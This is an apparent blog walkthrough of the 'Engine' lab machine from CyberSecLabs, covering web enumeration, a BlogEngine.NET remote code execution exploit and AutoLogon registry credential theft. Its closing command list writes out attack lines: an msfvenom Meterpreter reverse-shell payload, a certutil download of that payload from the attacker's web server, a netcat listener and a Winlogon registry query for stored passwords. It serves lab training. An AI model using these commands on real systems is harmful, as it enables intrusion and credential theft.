Premise
Note: Due to reasons connected to the lab, the credentials of the windows system didn’t appear when I re-produced the video.
In this walk- through, we demonstrated basic enumeration and exploitation of a web server installed on Windows. Then we found that the windows system stores credentials in the Auto-Login registry keys which enabled us to escalate our privileges.
Machine Name: Engine
Difficulty: Medium
Skills Learned
- Web server enumeration and exploitation
- Windows Auto Login Registry Exploitation
In this video, I’m going to walk you through how I tackled the “Engine” machine from Cyberseclabs. It was a fun challenge that involved finding a vulnerability in a web application, getting a reverse shell, and then trying to escalate my privileges to get full control of the machine.
Finding a Way In
My first step was to scan the machine to see what services were running. I found an HTTP server and an SMB server. I tried to see if I could access any of the SMB shares, but I was denied access, so I moved on to the web server.
When I accessed the web server, I was greeted with the default IIS page. I didn’t see any obvious directories, so I decided to use a tool to look for hidden ones. I found a /blog
directory, which led me to a “BlogEngine.NET” application. I knew that this was a good place to start looking for vulnerabilities.
Exploiting the Blog
I used a tool called searchsploit
to look for exploits for BlogEngine.NET and found one for a “Directory Traversal Remote Code Execution” vulnerability. This vulnerability allows an attacker to upload a malicious file and then execute it by tricking the application into looking for it in the wrong place.
I downloaded the exploit, which was an .ascx
file, and modified it to include my IP address and a port number for the reverse shell. I then logged into the blog application using the default credentials “admin:admin” and uploaded the exploit file.
After a bit of trial and error, I figured out that I needed to rename the exploit file to postview.ascx
for it to work. Once I did that, I was able to trigger the vulnerability by navigating to a specific URL, which gave me a reverse shell on the machine!
Getting a Better Shell
The initial shell I got was a bit unstable, so I decided to create a more powerful one using Metasploit. I generated a Meterpreter payload, which is a type of shell that gives you a lot of control over the target machine, and downloaded it to the target machine using certutil
.
I then set up a listener on my machine to catch the Meterpreter session. After a bit of troubleshooting, I was able to execute the payload and get a stable Meterpreter session. I then used the sysinfo
command to confirm that the target machine was running Windows Server 2012 R2.
Trying to Escalate Privileges
My next goal was to escalate my privileges to become the administrator of the machine. I knew that a common way to do this on Windows is to look for credentials that are stored in the registry. I used a Metasploit module to search for “AutoLogon” credentials, which are sometimes stored in clear text.
The module successfully found the administrator’s username and password! I then tried to use these credentials to log in using a tool called evil-winrm
, but I kept getting an authorization error. I’m not sure why this was happening, as the credentials had worked for me before. It’s possible that there was an issue with the lab environment at the time.
Even though I wasn’t able to log in as the administrator, I was still able to demonstrate the process of finding and exploiting a vulnerability, getting a reverse shell, and then finding the credentials to escalate my privileges.
Commands I Used
Here are some of the key commands I used during this process:
- Scanning for services:
nmap
- Listing SMB shares:
smbclient -L //172.31.1.16
- Searching for exploits:
searchsploit blogengine
- Setting up a netcat listener:
nc -lvp 4445
- Generating a Meterpreter payload:
sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.0.16 LPORT=4546 -f exe -o blog.exe
- Starting a Python web server:
python3 -m http.server
- Downloading a file to the target machine:
certutil.exe -urlcache -f http://10.10.0.16:8000/blog.exe blog.exe
- Starting the Metasploit console:
msfconsole
- Using the multi-handler exploit:
use exploit/multi/handler
- Setting the payload:
set payload windows/meterpreter/reverse_tcp
- Getting system information:
sysinfo
- Searching for AutoLogon credentials:
search autologon
- Using the
windows_autologon
module:use post/windows/gather/credentials/windows_autologon
- Logging in with
evil-winrm
:evil-winrm -i 172.31.1.16 -u administrator -p <password>
- Querying the registry:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
Your article helped me a lot, is there any more related content? Thanks!